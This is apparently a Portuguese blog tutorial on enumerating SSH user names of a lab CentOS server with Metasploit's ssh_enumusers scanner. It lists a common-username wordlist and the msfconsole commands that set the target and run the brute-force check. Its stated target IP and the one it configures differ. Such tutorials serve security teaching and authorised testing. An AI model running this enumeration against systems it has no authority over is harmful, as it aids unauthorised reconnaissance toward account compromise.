Metasploit Framework - Enumerando Usuários SSH do Servidor

Share:


Para realizar o teste de enumeração de usuários SSH de um servidor alvo faremos uso de uma ferramenta bem simples do Metasploit que será carregada como um Exploit e de uma wordlist com possíveis nomes de usuários do sistema. Realizaremos o teste analisando as respostas do servidor durante um processo de força bruta, no qual testaremos vários usuários SSH.


Abra inicie o PosgreSQL e o Metasploit Framework 

# service postgresql start
# msfconsole




Wordlist

Vamos supor que tenhamos uma Wordlist com nomes de usuários comuns como os abaixo:

#USERLIST PADRÃO
Administrator
administrator
test
asd
qwerty
matheus
superuser
security
sysadmin
operator
pedro
suporte
sysadmin
support
admin
Manager
manager
monitor
system
sysadm
12345
hello
root
Admin
ADMIN

Carregando os serviços e iniciando o ataque

Agora procure pelo termo ssh para verificar os exploits e auxiliares disponíveis para o termo.

msf > search ssh 

Agora vamos utilizar o scanner ssh_enumusers
Esse scanner é um auxiliar de força bruta que tende a testar os logins que estão dentro da uma wordlist

msf > use auxiliary/scanner/ssh/ssh_enumusers


Neste ambiente estarei realizando o ataque sobre um servidor rodando o CentOS 7 cujo IP é o 192.168.0.37

Vamos ver as opções do scanner carregado no Metasploit:

msf > show options

Aqui iremos definir as configurações do exploit

msf > set RHOSTS 192.168.0.102




Obs: O RPORT é por default setado na porta 22, caso você encontre uma porta diferente rodando o serviço de SSH, basta realizar

msf > set RPORT numerodaporta


Definindo a Wordlist

Como já expliicado, você deverá fazer uso de uma wordlist que deverá conter os nomes dos usuários a serem testados. Vamos carregar o caminho até ela no módulo USER_FILE

msf > set USER_FILE /home/matheus/userlist.txt 




Agora vamos a ação:

msf > run


Ele vai testar todos os logins que você tem na sua user list um a um e te mostrar os resultados positivos e negativos do teste.

Nenhum comentário